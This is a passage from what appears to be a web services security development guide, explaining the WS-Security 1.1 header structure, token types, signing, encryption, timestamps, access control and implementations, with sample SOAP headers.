Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;&lt;br /&gt;
             1106844369755&lt;br /&gt;
           &amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
